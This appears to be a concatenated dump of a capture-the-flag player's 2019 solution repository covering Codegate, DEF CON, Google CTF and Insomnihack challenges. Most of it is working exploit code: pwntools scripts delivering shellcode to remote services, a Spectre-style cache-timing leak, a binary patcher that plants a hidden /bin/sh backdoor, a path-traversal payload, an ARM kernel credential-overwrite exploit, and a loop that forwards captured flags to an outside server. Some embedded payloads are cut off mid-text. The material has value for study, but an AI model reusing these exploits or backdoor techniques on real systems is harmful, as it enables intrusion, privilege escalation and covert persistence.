r.sendline('m') 346 | r.sendline('4') 347 | r.sendline('5') 348 | r.sendline('m') 349 | r.sendline('2') 350 | r.sendline('4') 351 | 352 | for i in xrange(8): 353 | print 'done', i 354 | get_map() 355 | 356 | 357 | ######### 8th phase 358 | for i in xrange(3): 359 | action('e') 360 | action('>') 361 | action('<') 362 | get_map() 363 | 364 | action('m') 365 | r.sendline('3') 366 | r.sendline('4') 367 | 368 | for i in xrange(2): 369 | print 'done', i 370 | get_map() 371 | ############ 372 | 373 | ######### 8th phase 374 | for i in xrange(1): 375 | action('e') 376 | action('>') 377 | action('<') 378 | get_map() 379 | 380 | action('m') 381 | r.sendline('4') 382 | r.sendline('5') 383 | r.sendline('m') 384 | r.sendline('3') 385 | r.sendline('4') 386 | 387 | r.sendline('m') 388 | r.sendline('2') 389 | r.sendline('3') 390 | 391 | r.sendline('m') 392 | r.sendline('1') 393 | r.sendline('2') 394 | 395 | for i in xrange(4 + 3 + 3): 396 | print 'done', i 397 | get_map() 398 | 399 | action('>') 400 | action('>') 401 | action('m') 402 | r.sendline('0') 403 | r.sendline('1') 404 | 405 | for i in xrange(3): 406 | print 'done', i 407 | get_map() 408 | 409 | print get_map(wtfwtf=True) 410 | 411 | # r.interactive() 412 | 413 | # raw_input() 414 | 415 | print '----------------- [-] new phase -----------------------' 416 | ############ new phase 417 | ######### 9th phase 418 | action('<') 419 | 420 | for i in xrange(5): 421 | action('e') 422 | action('>') 423 | action('<') 424 | get_map() 425 | 426 | 427 | action('m') 428 | r.sendline('1') 429 | r.sendline('2') 430 | r.sendline('m') 431 | r.sendline('3') 432 | r.sendline('4') 433 | r.sendline('m') 434 | r.sendline('1') 435 | r.sendline('3') 436 | 437 | for i in xrange(8): 438 | print 'done', i 439 | get_map() 440 | 441 | ############### 10th phase 442 | 443 | for i in xrange(4): 444 | action('e') 445 | action('>') 446 | action('<') 447 | get_map() 448 | 449 | action('m') 450 | r.sendline('2') 451 | r.sendline('3') 452 | r.sendline('m') 453 | r.sendline('4') 454 | r.sendline('5') 455 | r.sendline('m') 456 | r.sendline('2') 457 | r.sendline('4') 458 | r.sendline('m') 459 | r.sendline('1') 460 | r.sendline('2') 461 | 462 | for i in xrange(11): 463 | print 'done', i 464 | get_map() 465 | 466 | 467 | 468 | ############### 11st phase 469 | 470 | for i in xrange(4): 471 | action('e') 472 | action('>') 473 | action('<') 474 | get_map() 475 | 476 | action('m') 477 | r.sendline('2') 478 | r.sendline('3') 479 | r.sendline('m') 480 | r.sendline('4') 481 | r.sendline('5') 482 | r.sendline('m') 483 | r.sendline('2') 484 | r.sendline('4') 485 | r.sendline('m') 486 | r.sendline('1') 487 | r.sendline('2') 488 | 489 | for i in xrange(11): 490 | print 'done', i 491 | get_map() 492 | 493 | 494 | ############### 12nd phase 495 | 496 | for i in xrange(3): 497 | action('e') 498 | action('>') 499 | action('<') 500 | get_map() 501 | 502 | action('m') 503 | r.sendline('3') 504 | r.sendline('4') 505 | 506 | for i in xrange(2): 507 | print 'done', i 508 | get_map() 509 | 510 | 511 | ############### 13rd phase 512 | 513 | for i in xrange(1): 514 | action('e') 515 | action('>') 516 | action('<') 517 | get_map() 518 | 519 | action('m') 520 | r.sendline('4') 521 | r.sendline('5') 522 | 523 | r.sendline('m') 524 | r.sendline('3') 525 | r.sendline('4') 526 | 527 | r.sendline('m') 528 | r.sendline('2') 529 | r.sendline('3') 530 | 531 | r.sendline('m') 532 | r.sendline('1') 533 | r.sendline('2') 534 | 535 | for i in xrange(11): 536 | print 'done', i 537 | get_map() 538 | 539 | 540 | 541 | ############### 14th phase 542 | 543 | for i in xrange(4): 544 | action('e') 545 | action('>') 546 | action('<') 547 | get_map() 548 | 549 | action('m') 550 | r.sendline('2') 551 | r.sendline('3') 552 | r.sendline('m') 553 | r.sendline('4') 554 | r.sendline('5') 555 | r.sendline('m') 556 | r.sendline('2') 557 | r.sendline('4') 558 | r.sendline('m') 559 | r.sendline('1') 560 | r.sendline('2') 561 | 562 | for i in xrange(11): 563 | print 'done', i 564 | get_map() 565 | 566 | 567 | ############### 15th phase 568 | 569 | for i in xrange(3): 570 | action('e') 571 | action('>') 572 | action('<') 573 | get_map() 574 | 575 | action('m') 576 | r.sendline('3') 577 | r.sendline('4') 578 | 579 | for i in xrange(2): 580 | print 'done', i 581 | get_map() 582 | 583 | ############ 584 | 585 | 586 | ############### 16th phase 587 | 588 | for i in xrange(1): 589 | action('e') 590 | action('>') 591 | action('<') 592 | get_map() 593 | 594 | action('m') 595 | r.sendline('4') 596 | r.sendline('5') 597 | 598 | r.sendline('m') 599 | r.sendline('3') 600 | r.sendline('4') 601 | 602 | r.sendline('m') 603 | r.sendline('2') 604 | r.sendline('3') 605 | 606 | 607 | for i in xrange(8): 608 | print 'done', i 609 | get_map() 610 | 611 | 612 | ############### 17th phase 613 | 614 | for i in xrange(3): 615 | action('e') 616 | action('>') 617 | action('<') 618 | get_map() 619 | 620 | action('m') 621 | r.sendline('3') 622 | r.sendline('4') 623 | 624 | for i in xrange(2): 625 | print 'done', i 626 | get_map() 627 | 628 | ############### 18th phase 629 | 630 | for i in xrange(1): 631 | action('e') 632 | action('>') 633 | action('<') 634 | get_map() 635 | 636 | action('m') 637 | r.sendline('4') 638 | r.sendline('5') 639 | 640 | r.sendline('m') 641 | r.sendline('3') 642 | r.sendline('4') 643 | 644 | for i in xrange(5): 645 | print 'done', i 646 | get_map() 647 | 648 | 649 | ############### 19th phase 650 | 651 | for i in xrange(2): 652 | action('e') 653 | action('>') 654 | action('<') 655 | get_map() 656 | 657 | action('m') 658 | r.sendline('4') 659 | r.sendline('5') 660 | 661 | for i in xrange(2): 662 | print 'done', i 663 | get_map() 664 | 665 | action('x') 666 | 667 | # r.interactive() 668 | 669 | r.sendline('x'*1598) 670 | 671 | for i in xrange(1598): 672 | if i % 100 == 0: 673 | print 'done', i 674 | get_map() 675 | 676 | action('<') 677 | action('v') 678 | r.sendline('v'*10) 679 | 680 | for i in xrange(10): 681 | if i % 10 == 0: 682 | print 'done', i 683 | get_map() 684 | 685 | 686 | action('>') 687 | get_map() 688 | action('>') 689 | get_map() 690 | action('s') 691 | ############### final 692 | 693 | # for i in xrange(1): 694 | # action('a') 695 | # action('>') 696 | # action('<') 697 | # get_map() 698 | 699 | 700 | 701 | # action('e') 702 | 703 | # print r.recvall() 704 | 705 | # raw_input('?') 706 | 707 | r.interactive() 708 | 709 | -------------------------------------------------------------------------------- /2019/codegate_final/bash_adventure/solve.sh: -------------------------------------------------------------------------------- 1 | #!bash 2 | exec 3<>/dev/tcp/127.0.0.1/port # I can't remember port number. 3 | read -r -u -n $MESSAGE <&3 4 | echo $MESSAGE 5 | -------------------------------------------------------------------------------- /2019/codegate_final/readme.md: -------------------------------------------------------------------------------- 1 | - I solved other web and misc challs. (its actually all the misc zzz) 2 | - But I deleted(or not saved) exploit/solver. 3 | - Sry. 4 | - If you have any questions for final challs just send me an email. 5 | -------------------------------------------------------------------------------- /2019/codegate_final/shage_beta/a.py: -------------------------------------------------------------------------------- 1 | from requests import get, put 2 | 3 | cookie = 'session=4b362d57-2ea8-4f1e-93cb-90fac2e238f4' 4 | url = 'http://110.10.147.124/stars?page={}' 5 | 6 | headers = { 7 | 'Cookie': cookie, 8 | 'Content-Type': 'application/x-www-form-urlencoded', 9 | 'X-CSRF-Token': 'IjhmN2MzZGQ0MGY0ZTEzNzQ2MmQ1NGE3YThhYmNmYTAyYmIxYmM2YzYi.XJqScg.KYvCK9MrXqSlguAekdfjDymZW94' 10 | 11 | } 12 | 13 | share_url_list = [] 14 | 15 | for i in xrange(1, 16+1): 16 | c = get(url.format(i), headers = headers).content 17 | x = c.split(' 2 | 3 | #define WASM_EXPORT __attribute__((visibility("default"))) 4 | 5 | /* 6 | WASM_EXPORT 7 | int main(void) { 8 | printf("Hello World\n"); 9 | } 10 | */ 11 | 12 | /* External function that is implemented in JavaScript. */ 13 | extern void env(); 14 | extern void debug_flush(unsigned long long int); 15 | extern void debug_read(unsigned long long int); 16 | extern void check_data(unsigned int); 17 | extern unsigned long long int get_data_size(); 18 | extern unsigned long long int get_data3(); 19 | extern unsigned long long int get_data5(); 20 | extern unsigned long long int debug_ts(); 21 | 22 | /* 23 | debug_read(caching size) 24 | 25 | void __cdecl check_data(size_t idx) 26 | { 27 | if ( data_size > idx ) 28 | temp &= *(&data5.data_ptr + 0x200 * *(&data3.data_ptr + idx)); 29 | } 30 | 31 | */ 32 | 33 | int lestgo(size_t malicious_x) { 34 | 35 | static int results[256]; 36 | int tries, i, j, k, mix_i, junk = 0; 37 | size_t training_x, x; 38 | register unsigned long long int time1, time2; 39 | volatile unsigned char * addr; 40 | 41 | unsigned long long int data5 = get_data5(); 42 | unsigned long long int data3 = get_data3(); 43 | unsigned long long int data_size = data3 - 0x10; 44 | 45 | 46 | for (i = 0; i < 256; i++) 47 | results[i] = 0; 48 | for (tries = 999; tries > 0; tries--) { 49 | 50 | /* Flush array2[256*(0..255)] from cache */ 51 | for (i = 0; i < 256; i++) 52 | debug_flush(data5 + i * 512); /* intrinsic for clflush instruction */ 53 | 54 | /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ 55 | training_x = tries % 0x10; 56 | for (j = 29; j >= 0; j--) { 57 | debug_flush(data_size); 58 | for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ 59 | 60 | /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ 61 | /* Avoid jumps in case those tip off the branch predictor */ 62 | x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ 63 | x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ 64 | x = training_x ^ (x & (malicious_x ^ training_x)); 65 | 66 | /* Call the victim! */ 67 | check_data(x); 68 | 69 | } 70 | 71 | /* Time reads. Order is lightly mixed up to prevent stride prediction */ 72 | for (i = 0; i < 256; i++) { 73 | mix_i = ((i * 167) + 13) & 255; 74 | time1 = debug_ts(); 75 | debug_read(data5 + mix_i * 512); 76 | if (debug_ts() - time1 <= 500) 77 | results[mix_i]++; /* cache hit - add +1 to score for this value */ 78 | } 79 | 80 | /* Locate highest & second-highest results results tallies in j/k */ 81 | j = k = -1; 82 | for (i = 0; i < 128; i++) { 83 | if (j < 0 || results[i] >= results[j]) { 84 | k = j; 85 | j = i; 86 | } else if (k < 0 || results[i] >= results[k]) { 87 | k = i; 88 | } 89 | } 90 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 91 | break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */ 92 | } 93 | results[0] ^= junk; /* use junk so code above won’t get optimized out*/ 94 | 95 | return j; 96 | } 97 | 98 | WASM_EXPORT 99 | int this_is_what_ive_got() { 100 | 101 | int i; 102 | unsigned int j = 0; 103 | int idx__ = 4; 104 | size_t malicious_x; 105 | for (i=0; i<3; i++) { 106 | malicious_x = 0x100 + idx__ + i; 107 | j += letsgo(malicious_x); 108 | j <<= 8; 109 | } 110 | 111 | malicious_x = 0x100 + idx__ + i; 112 | j += letsgo(malicious_x); 113 | 114 | 115 | return j; 116 | } 117 | 118 | -------------------------------------------------------------------------------- /2019/defcon/lcars/readme.md: -------------------------------------------------------------------------------- 1 | - i will post full-writeup for lcars series asap. 2 | -------------------------------------------------------------------------------- /2019/defcon/lcars/solve_first.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | # ./LCARS init.sys loader.sys echo.sys crypto.sys root.key flag1.papp flag2.txt flag3.txt 5 | # r = process(['./LCARS', 'init.sys', 'loader.sys', 'echo.sys', 'crypto.sys', 'root.key', 'flag1.papp', 'flag2.txt', 'flag3.txt']) 6 | r = remote('lcars000.quals2019.oooverflow.io', 5000) 7 | 8 | script = ''' 9 | b *0x0000000100001BEC 10 | b *0x00000001000011AA 11 | set follow-fork-mode child 12 | set follow-fork-mode parent 13 | ''' 14 | 15 | # gdb.attach(r, script) 16 | 17 | HEADER = 'EFIL' + p32(0x1) 18 | HEADER = HEADER.ljust(0x28, '\x00') 19 | 20 | CODE_LENGTH = 0x300 21 | 22 | SECOND = p32(0x20001000) # 0x1000 align 23 | SECOND += p32(CODE_LENGTH) # code_length 0x10 align, < 0xfff 24 | SECOND += '\x05' # sig param 8 // & 7 -> rwx 25 | SECOND += '\x00' # 0 or 1 26 | SECOND += '\x00' # sig param 10 27 | SECOND += '\x00' # 0 or 1 28 | SECOND = SECOND.ljust(0x0c, '\x00') 29 | 30 | context.arch = 'amd64' 31 | SIG_INFO = '' 32 | SIG_INFO += asm('mov rax, 0x30000000') 33 | SIG_INFO += asm('mov rbx, 0') 34 | SIG_INFO += asm('mov [rax], rbx') # switch / case 35 | SIG_INFO += asm('mov rbx, 1') 36 | SIG_INFO += asm('mov [rax+4], rbx') # s 37 | SIG_INFO += asm('mov rbx, 0xff00') # length 38 | SIG_INFO += asm('mov [rax+8], rbx') # 39 | SIG_INFO += asm('mov rbx, 1') 40 | SIG_INFO += asm('mov [rax+12], rbx') # 41 | SIG_INFO += asm('mov rbx, 1') 42 | SIG_INFO += asm('mov [rax+16], rbx') # 43 | SIG_INFO += asm('mov r13, 0x30000000') 44 | SIG_INFO += asm(shellcraft.write(0, 'r13', 0x200)) 45 | SIG_INFO += '\xc3' 46 | SIG_INFO = SIG_INFO.ljust(0x100, '\x41') 47 | 48 | # shared = 0x40000000 49 | 50 | CRYPTO_INFO = '' 51 | CRYPTO_INFO = CRYPTO_INFO.ljust(0x30, '\x42') 52 | 53 | CODE = '' 54 | CODE += '\xcc' 55 | CODE = CODE.ljust(CODE_LENGTH, '\xcc') 56 | 57 | data = '' 58 | data += HEADER 59 | data += SECOND 60 | data += SIG_INFO 61 | data += CRYPTO_INFO 62 | data += CODE 63 | 64 | 65 | r.sendline('run flag1.papp') 66 | r.sendline('download juno.sys %d' % len(data)) 67 | r.send(str(data)) 68 | r.sendline('run juno.sys') 69 | 70 | r.interactive() 71 | -------------------------------------------------------------------------------- /2019/defcon/readme.md: -------------------------------------------------------------------------------- 1 | # defcon ctf 2019 prequal 2 | 3 | - i solved rtoos, lcars, gloryhost and supported some other challs. 4 | - btw, some funny pictures for shellql. (https://gist.github.com/junorouse/0b89455d2f49fffb22304dc50b0d0c80) 5 | - i hope that someday i can write some papers about **LUCKY-DRIVEN-HACKING**. 6 | 7 | 8 | -------------------------------------------------------------------------------- /2019/defcon/rtoos/readme.md: -------------------------------------------------------------------------------- 1 | - if there is no more space to alloc then crux returns 0. 2 | - since the code section has RWX, base address=0, cs=0, we can simply overwrite the code, and execute arbitrary command. 3 | - i could extract honcho(main hypervisor) binary via `out` ins. (crux binary bans `honcho` string) 4 | 5 | - there is an out of bound access/write bug. no limitation of `vmmem` index. 6 | - i don't make sense but in mac os, when you alloc large memory via `valloc`, the offset between its address and image base is always same. 7 | - there is a little offset difference machine by machine, so i need to bruteforce it. 8 | 9 | - @c2w2m2 wrote final solver. 10 | -------------------------------------------------------------------------------- /2019/defcon/rtoos/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | r = remote('rtooos.quals2019.oooverflow.io', 5000) 7 | 8 | libc_fclose = 0x8da20 - 0x1a78 9 | libc_exit = 0x8da20 - 0x1a70 10 | got_puts = 0x8da20 - 0x1b50 11 | 12 | data = ''' 13 | mov rax, -0x%x 14 | mov di, 0x64 15 | out dx, al 16 | 17 | mov rax, -0x%x 18 | mov di, 0x64 19 | out dx, al 20 | 21 | mov rax, 0x3000 22 | mov rsi, 0x10 23 | mov rdi, 0x63 24 | out dx, al 25 | 26 | mov rax, -0x%x 27 | mov di, 0x63 28 | mov rsi, 0x8 29 | out dx, al 30 | 31 | mov rax, 0x3000 32 | mov di, 0x64 33 | out dx, al 34 | 35 | ''' % (libc_fclose, libc_exit, got_puts) 36 | q = asm(data) 37 | 38 | context.log_level ='debug' 39 | payload = '\x90' * 100 40 | payload += q 41 | 42 | for i in xrange(7): 43 | r.sendlineafter('[RTOoOS>', 'export a') 44 | 45 | r.sendlineafter('[RTOoOS>', 'export a=%s' % payload) 46 | 47 | libc = u64(r.recvuntil("\x7f")[1:]+'\x00\x00') 48 | pie = u64(r.recv(6)[1:]+"\x00\x00\x00") - 0x1bee 49 | 50 | r.sendline("/bin/sh\x00") 51 | 52 | sleep(0.1) 53 | r.sendline(p64(libc - 0x000000000003a8f0 + 0x0000000000062CF9)) 54 | r.interactive() 55 | -------------------------------------------------------------------------------- /2019/defcon_final/aoool/self_backdoor.py: -------------------------------------------------------------------------------- 1 | from os import system 2 | 3 | system("cp aoool z") 4 | 5 | from pwn import * 6 | 7 | context.arch = 'amd64' 8 | e = ELF("./z") 9 | print e.address 10 | e.asm(0x22a66, ''' 11 | call $+21914 /* relative jump to eh_frame segment */ 12 | ''') 13 | 14 | e.asm(0x28000, ''' 15 | mov r15 , 44280206666 /* JUNO\n\x00\x00\x00 */ 16 | cmp [rbp], r15 17 | jnz x 18 | ''' + 19 | 20 | shellcraft.amd64.sh() 21 | 22 | + ''' 23 | x: 24 | ret 25 | ''') 26 | 27 | e.save("x") 28 | -------------------------------------------------------------------------------- /2019/defcon_final/jtaste/solve.py: -------------------------------------------------------------------------------- 1 | from requests import Session 2 | import json 3 | 4 | s = Session() 5 | 6 | url = 'http://10.13.37.13:5080' 7 | 8 | s.get(url) # for session intialize 9 | 10 | c = s.get(url + '/api/getboard') 11 | output = json.loads(c.text) 12 | 13 | # 721,721,247 14 | 15 | def gen_path(string): 16 | x = [] 17 | for s in string: 18 | if s == '.': 19 | x.append(721) 20 | elif s == '/': 21 | x.append(247) 22 | else: 23 | x.append(ord(s)) 24 | 25 | return x 26 | 27 | attack_path = '../../../../../../../../../flag' 28 | 29 | sigs = output['sigs'] 30 | 31 | payload = { 32 | 'sig': sigs[sigs.keys()[0]], 33 | 'v': sigs.keys()[0], 34 | } 35 | 36 | for i in range(len(attack_path)): 37 | c = s.post(url + '/api/verify', json=payload) 38 | print c.text 39 | 40 | 41 | payload = { 42 | 'state': { 43 | 'counter': [0, 1, gen_path(attack_path)] 44 | } 45 | } 46 | 47 | c = s.post(url + '/api/', json=payload) 48 | print c.text 49 | 50 | c = s.get(url + '/api/persistent') 51 | print c.text # flag 52 | -------------------------------------------------------------------------------- /2019/defcon_final/telooogram/exploit.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | import sys 3 | 4 | url = 'http://telooogram.oooverflow.io//send?token=39faeeb98663192c0a2a4b992ec775ce&to=SeoulPlusBadAss_d44681b5f668cdccabab046b33bcf006&blob=' 5 | 6 | url = 'http://telooogram.oooverflow.io//send?token=99aa4446a37deffbc33bdf07d5449067&to=team%02d&blob=' % int(sys.argv[1]) 7 | # print url+c 8 | c = '62706c6973743030d40102030405063132582476657273696f6e58246f626a65637473592461726368697665725424746f7012000186a0a90708191a1e2428292d55246e756c6cd8090a0b0c0d0e0f1011121314151617185f101d4f4f4f556e697175654964656e7469666965724d6573736167654b65795624636c6173735f10144f4f4f4f726967696e456e636f64696e674b65795f10114f4f4f4174746163686d656e74734b65795f10154f4f4f436865636b73756d4d6573736167654b65795f10124f4f4f44617465456e636f64696e674b65795f10154f4f4f4d657373616765456e636f64696e674b65795f10184f4f4f4d657373616765547970654d6573736167654b6579127ac0be1180088005800013000000010721ccd880038002100154666c6167d21b0a1c1d574e532e74696d652341c17f136a644a388004d21f2021225a24636c6173736e616d655824636c6173736573564e5344617465a22123584e534f626a656374d2250a26275f10144f4f4f5061727469636970616e745569644b6579800680075f103053656f756c506c75734261644173735f6434343638316235663636386364636361626162303436623333626366303036d21f202a2b5e4f4f4f5061727469636970616e74a22c235e4f4f4f5061727469636970616e74d21f202e2f5a4f4f4f4d657373616765a230235a4f4f4f4d6573736167655f100f4e534b657965644172636869766572d1333454726f6f74800100080011001a0023002d003200370041004700580078007f009600aa00c200d700ef010a010f011101130115011e0120012201240129012e0136013f014101460151015a01610164016d01720189018b018d01c001c501d401d701e601eb01f601f9020402160219021e0000000000000201000000000000003500000000000000000000000000000220' 9 | c = post(url + c) 10 | 11 | # print c.text 12 | -------------------------------------------------------------------------------- /2019/defcon_final/telooogram/poll_submit_flag.py: -------------------------------------------------------------------------------- 1 | from requests import get, post 2 | import time 3 | import json 4 | 5 | while True: 6 | c = get('http://telooogram.oooverflow.io//msg?token=99aa4446a37deffbc33bdf07d5449067') 7 | try: 8 | data = json.loads(c.text) 9 | for x in data: 10 | if 'MDAwR'.encode('hex') in x['blob']: 11 | flag = ('MDAw' + x['blob'].decode('hex').split('MDAw')[1][:60]).decode('base64') 12 | c = post('http://54.177.169.8:4000/api/submit_flag/'+ flag) 13 | print c.text 14 | elif 'eyAidXNlcm'.encode('hex') in x['blob']: 15 | print 'findfind!!!', x['blob'] 16 | except Exception as e: 17 | print e 18 | print 'error' 19 | -------------------------------------------------------------------------------- /2019/gctf/bnv/readme.md: -------------------------------------------------------------------------------- 1 | # BNV 2 | 3 | This is a web service which can inquire the information of the world's Braille office. 4 | 5 | ## Vulnerability 6 | 7 | There is a SIMPLE XXE bug. 8 | 9 | ## Exploit 10 | 11 | ```xml 12 | 13 | 15 | 16 | 17 | 20 | "> 21 | %eval; 22 | %error; 23 | 24 | '> 25 | 26 | %local_dtd; 27 | 28 | ]> 29 | 30 | ``` 31 | -------------------------------------------------------------------------------- /2019/gctf/devmaster8000/readme.md: -------------------------------------------------------------------------------- 1 | # devmaster 8000 2 | 3 | cloud build system. 4 | 5 | ## Vulnerability 6 | 7 | There is a setuid misconfiguration on `drop_privs` file. 8 | 9 | ## Exploit 10 | 11 | `/client nc devmaster.ctfcompetition.com 1337 -- source.c -- my_binary -- ../../drop_privs admin admin cat ../../flag` 12 | -------------------------------------------------------------------------------- /2019/gctf/doomed_to_repeat_it/readme.md: -------------------------------------------------------------------------------- 1 | # Doomed to Repeat It 2 | 3 | This is a (golang + javascript) memory game. 4 | 5 | ## Vulnerability 6 | 7 | ```go 8 | // OsRand gets some randomness from the OS. 9 | func OsRand() (uint64, error) { 10 | // 64 ought to be enough for anybody 11 | var res uint64 12 | if err := binary.Read(rand.Reader, binary.LittleEndian, &res); err != nil { 13 | return 0, fmt.Errorf("couldn't read random uint64: %v", err) 14 | } 15 | // Mix in some of our own pre-generated randomness in case the OS runs low. 16 | // See Mining Your Ps and Qs for details. 17 | res *= 14496946463017271296 18 | fmt.Println("random", res); 19 | return res, nil 20 | } 21 | ``` 22 | 23 | `hex(14496946463017271296) == 0xc92f800000000000` the lower bits of pre-generated randomness are zero. Only Ffwer seeds are generated, that can be bruteforced. 24 | 25 | ## Exploit 26 | 27 | 28 | ```go 29 | func main() { 30 | a := [28][28][28][28][]int{} 31 | 32 | b := &board{ 33 | nums: make([]int, 56), 34 | visible: make([]bool, 56), 35 | } 36 | 37 | for loop := 0; loop < 0x100000; loop++ { 38 | // fmt.Println(i) 39 | if (loop % 0x1000 == 0) { 40 | fmt.Println("here", loop / 0x1000) 41 | } 42 | 43 | rand, _ := random.New2(uint64(loop)) 44 | 45 | // BoardSize is even 46 | for i, _ := range b.nums { 47 | b.nums[i] = i / 2 48 | } 49 | // https://github.com/golang/go/wiki/SliceTricks#shuffling 50 | for i := 56 - 1; i > 0; i-- { 51 | j := rand.UInt64n(uint64(i) + 1) 52 | // fmt.Println(j); 53 | b.nums[i], b.nums[j] = b.nums[j], b.nums[i] 54 | } 55 | 56 | a[b.nums[0]][b.nums[1]][b.nums[2]][b.nums[3]] = append(a[b.nums[0]][b.nums[1]][b.nums[2]][b.nums[3]], loop) 57 | } 58 | 59 | file, _ := json.Marshal(a) 60 | 61 | _ = ioutil.WriteFile("test.json", file, 0644) 62 | ... 63 | ``` 64 | 65 | 66 | ```javascript 67 | protocol = window.location.protocol === 'https:' ? 'wss://' : 'ws://'; 68 | ws = new WebSocket(protocol + window.location.host + '/ws'); 69 | 70 | let table = []; 71 | 72 | ws.onopen = () => { 73 | ws.send(JSON.stringify({op: 'guess', body: {X: 0, Y: 0}})); 74 | ws.send(JSON.stringify({op: 'guess', body: {X: 1, Y: 0}})); 75 | ws.send(JSON.stringify({op: 'guess', body: {X: 2, Y: 0}})); 76 | ws.send(JSON.stringify({op: 'guess', body: {X: 3, Y: 0}})); 77 | } 78 | ws.onmessage = (x) => { 79 | let y = JSON.parse(x.data); 80 | let board = y.board; 81 | for (let i=0; i 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | // gcc -o a a.c libc.s -nostartfiles -nostdlib -static -Os 21 | // 22 | __attribute__((naked)) long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, unsigned long arg){ 23 | 24 | __asm __volatile ( 25 | "swi 0x9000DD\n" 26 | "mov pc, lr\n" 27 | : 28 | : 29 | : 30 | ); 31 | } 32 | 33 | #define F_OFD_GETLK 36 34 | #define F_OFD_SETLK 37 35 | #define F_OFD_SETLKW 38 36 | 37 | int _start(void) 38 | { 39 | 40 | int fd = open("/proc/cpuinfo", O_RDONLY); 41 | struct flock *map_base = 0; 42 | struct flock *map_base2 = 0; 43 | 44 | if(fd == -1){ 45 | write(1, "open error\n", 11); 46 | return -1; 47 | } 48 | 49 | map_base = (struct flock *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 50 | 51 | map_base->l_start = SEEK_SET; 52 | 53 | unsigned int f_task = 0xc1307080 + 500; 54 | read(0, &f_task, 4); 55 | 56 | if(sys_oabi_fcntl64(fd, F_OFD_GETLK, (long)map_base)){ 57 | write(1, "fcnt error\n", 11); 58 | return -1; 59 | } 60 | 61 | 62 | unsigned int next_task = 0; 63 | unsigned int *juno= 0; 64 | unsigned int task_offset = 500; 65 | unsigned int comm_offset = 900; 66 | 67 | 68 | write(1, "[+] find sh cred haha\n", 22); 69 | 70 | 71 | write(1, f_task - task_offset + comm_offset, 5); 72 | write(1, "\n", 1); 73 | write(1, "done!\n", 6); 74 | 75 | 76 | int wtf; 77 | 78 | int junofd = open("./tmp", O_WRONLY); 79 | write(junofd, f_task, 4); 80 | close(junofd); 81 | 82 | int junofd2 = open("./tmp_cred", O_WRONLY); 83 | write(junofd, f_task+400-4, 4); 84 | close(junofd); 85 | 86 | 87 | // write(1, next_task - task_offset + comm_offset, 5); 88 | 89 | write(1, "\n", 1); 90 | write(1, "done!\n", 6); 91 | 92 | _exit(0); 93 | } 94 | 95 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/b.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | // gcc -o a a.c libc.s -nostartfiles -nostdlib -static -Os 21 | // 22 | __attribute__((naked)) long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, unsigned long arg){ 23 | 24 | __asm __volatile ( 25 | "swi 0x9000DD\n" 26 | "mov pc, lr\n" 27 | : 28 | : 29 | : 30 | ); 31 | } 32 | 33 | #define F_OFD_GETLK 36 34 | #define F_OFD_SETLK 37 35 | #define F_OFD_SETLKW 38 36 | 37 | 38 | int _start(void) 39 | { 40 | 41 | int fd = open("/proc/cpuinfo", O_RDONLY); 42 | struct flock *map_base = 0; 43 | struct flock *map_base2 = 0; 44 | 45 | if(fd == -1){ 46 | write(1, "open error\n", 11); 47 | return -1; 48 | } 49 | 50 | map_base = (struct flock *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 51 | 52 | map_base->l_start = SEEK_SET; 53 | 54 | unsigned int cred = 0; 55 | 56 | int junofd = open("./tmp_cred", O_RDONLY); 57 | read(junofd, &cred, 4); 58 | close(junofd); 59 | 60 | if(sys_oabi_fcntl64(fd, F_OFD_GETLK, (long)map_base)){ 61 | write(1, "fcnt error\n", 11); 62 | return -1; 63 | } 64 | 65 | write(1, "[+] gogo cred haha\n", 22); 66 | 67 | int pipefd[2]; 68 | 69 | pipe(pipefd); 70 | write(pipefd[1], cred+0x30, 4); 71 | read(pipefd[0], cred+4, 4); 72 | write(pipefd[1], cred+0x30, 4); 73 | read(pipefd[0], cred+8, 4); 74 | write(pipefd[1], cred+0x30, 4); 75 | read(pipefd[0], cred+12, 4); 76 | write(pipefd[1], cred+0x30, 4); 77 | read(pipefd[0], cred+16, 4); 78 | write(pipefd[1], cred+0x30, 4); 79 | read(pipefd[0], cred+20, 4); 80 | write(pipefd[1], cred+0x30, 4); 81 | read(pipefd[0], cred+24, 4); 82 | write(pipefd[1], cred+0x30, 4); 83 | read(pipefd[0], cred+28, 4); 84 | write(pipefd[1], cred+0x30, 4); 85 | read(pipefd[0], cred+32, 4); 86 | 87 | close(pipefd[0]); 88 | close(pipefd[1]); 89 | 90 | write(1, "\n", 1); 91 | write(1, "done!\n", 6); 92 | 93 | _exit(0); 94 | } 95 | 96 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/build_exp.sh: -------------------------------------------------------------------------------- 1 | arm-linux-gnueabi-gcc -o b b.c libc.s -nostartfiles -nostdlib -static -Os -w 2 | cat b | base64 3 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/build_leak.sh: -------------------------------------------------------------------------------- 1 | arm-linux-gnueabi-gcc -o a a.c libc.s -nostartfiles -nostdlib -static -Os -w 2 | cat a | base64 3 | 